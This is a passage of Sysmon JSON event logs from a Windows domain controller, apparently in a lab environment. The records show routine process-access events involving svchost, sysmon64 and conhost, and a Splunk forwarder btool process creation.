C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3574,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3575,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3576,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3577,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3578,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3579,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3580,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010CB800500}\r\nTargetProcessId: 2864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010CB800500}","TargetProcessId":"2864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3581,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.979\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-00108C810500}\r\nProcessId: 3120\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-0010CB800500}\r\nParentProcessId: 2864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.979","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-00108C810500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 